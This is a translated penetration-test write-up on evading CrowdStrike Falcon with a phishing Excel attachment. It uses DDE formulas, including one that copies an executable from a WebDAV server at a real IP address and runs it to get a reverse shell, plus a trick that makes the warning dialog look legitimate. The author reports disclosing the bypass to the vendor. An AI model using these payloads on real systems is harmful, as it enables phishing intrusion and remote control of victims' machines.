利用钓鱼邮件的恶意Excel附件绕过检测获取反向shell
Stefano 渗透测试 11083浏览 · 2019-01-21 01:28

原文地址:https://0x00sec.org/t/bypassing-crowdstrike-falcon-detection-from-phishing-email-to-reverse-shell/10802

Crowdstrike Falcon是新型端点安全解决方案的一部分,它会尝试通过使用机器学习和行为分析来检测和拦截异常活动(至少官方的说法是这样的)。

可以确认的是,如果靶机上安装了Falcon,那些广为人知的攻击手段(例如通过Powershell, WScript, Bitsadmin, mshta,等等)统统都不会奏效。这会让攻击者举步维艰。它可能和其他的端点安全解决方案类似,例如Carbon Black,Cylance等等。

这里我说的绕过,指的是完全绕过检测,从发布钓鱼邮件到接收用户反弹回来的shell。都是可以实际应用的,不只是写一个恶意软件然后再执行一下它而已。

既然我们不能利用经典的手段来攻击,那么不妨尝试一下使用一些新的(旧)技巧?

事实证明,过程还是挺繁琐的¯\(ツ)/¯.

配置

攻击者:

  • 一台从LowEndBox买的廉价VPS,安装apache2,启用mod_webdav模块。
  • 一个使用pyinstaller —onefile打包成二进制文件的Python反弹shell语句。
  • 构造过的Excel文件。

目标VM:

  • Windows 10 1803,最新版,已打安全补丁。
  • Crowdstrike Falcon Sensor(最新版)
  • Excel 2016(已打补丁),配置了公司邮箱的Outlook。

第一步:附件

这次我决定用一些鲜为人知的东西,比一个简单的宏要棘手一些。我需要确保它不会被公司的email过滤器和windows defender检测到。它有可能会被Falcon检测出来,但我还是决定先试一下。

所以我用的是前段时间在Hancitor上学到一个一个技巧,它利用的是动态数据交换(DDE)功能而不是宏。

一开始我尝试通过在Word文档中插入公式(CTRL+F9)的方式写入,内容如下:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k notepad.exe"}

不巧的是,这行公式并没有弹出记事本。搜索了一下,发现微软在2017年12月发布的一个补丁已经禁用了Word的这个功能。

所以在Word中就行不通了……那么,试一下Excel?

第二次尝试,在Excel中插入公式:

=cmd|'/c notepad.exe'!_xlbgnm.A1

成功了!

为了增加用户对其的可信度,可以修改用户警告框中显示的消息。

原始的消息会是像下面这种:

可以用EXCEL.EXE替换掉CMD.EXE,这样看起来更合适些。

=EXCEL|'\..\..\..\Windows\System32\cmd.exe /c notepad.exe'!_xlbgnm.A1

现在警告消息看起来就很正常了:

现在我们可以通过附件来执行代码了,假设用户会忽略警告信息,直接点击Yes。那么,我们要如何利用它来下载和执行payload呢?

第二步:WebDAV

为什么选择WebDAV呢?如果使用流行的、常见的方式,我毫无疑问会被检测到,我需要一个与众不同的方法。然后,我想起来了Windows可以用资源管理器连接和浏览WebDAV。你知道我要干嘛了吗?

我配置了一台简单的VPS,开启Apache服务,启用mod_webdav模块。然后把端口改到了正在用netcat监听的443端口。

第三步:执行反向shell

制作一个反向shell很简单,我需要做的只是使用能在Windows上执行的Python反向Shell代码。在Github上或者一些渗透测试的博客里面就能找到很多。为什么选择Python呢,因为它的隐蔽性比较强。其次,我可以通过pyinstaller --onefile run.py命令来执行生成一个可执行文件。

shell准备好之后上传到WebDAV的根目录。

现在试试能不能在目标靶机上运行:

=cmd|'/c cmd.exe /c "\\167.160.187.142\\webdav\run.exe"'!_xlbgnm.A1

没成功,为什么呢?我在CMD下运行了这条命令,然后提示我:

The specified path does not exist.
Check the path, and then try again.

payload是没问题的。还是一顿搜索后我找到了这篇文章)。我要做的就是把文件重命名为run.txt,然后把文件拷贝到了机器上(毕竟那是网络路径),然后本地运行,奏效了。

=cmd|'/c cmd.exe /c "copy \\167.160.187.142\webdav\run.txt c:\users\public\run.exe" && cmd.exe /c "c:\users\public\run.exe"'!_xlbgnm.A1

第四步:综合利用

Crowdstrike Falcon使用行为分析来检测试图执行代码的恶意Office文档。比如像这样的流程执行树就会被检测到:

explorer.exe > outlook.exe > excel.exe > powershell.exe -windowstyle hidden -executionpolicy bypass -enc

是因为流程执行树有问题,还是因为powershell的参数出了问题?这点目前还不清楚。

总体流程如下:

  • 从一个垃圾邮箱创建一封电子邮件,添加恶意Excel文件作为附件
  • 将邮件发送到公司邮箱
  • 在Outlook的公司邮箱中打开邮件,打开附件,在警告框中点击“yes”
  • 等待
  • 接收到靶机的shell

嗯?等等?这就完事儿了?我确认了一下,Falcon服务是正在运行的。再去Falcon的仪表盘检查一下主机,看看它是否还在通信,结果是还在。然后我又试了一次,嗯,没错,又成功了。

Falcon又检测到了什么呢?

虽然这不算一个漏洞,但我写这篇文章前,还是在2018年12月21日向Crowdstrike报告了这个绕过技巧。这样就不会被攻击者滥用了(尽管有这有可能已经发生了)。

Crowdstrike确认绕过是有效的,并于2019年1月11日发布补丁。

1 条评论
某人
表情
可输入 255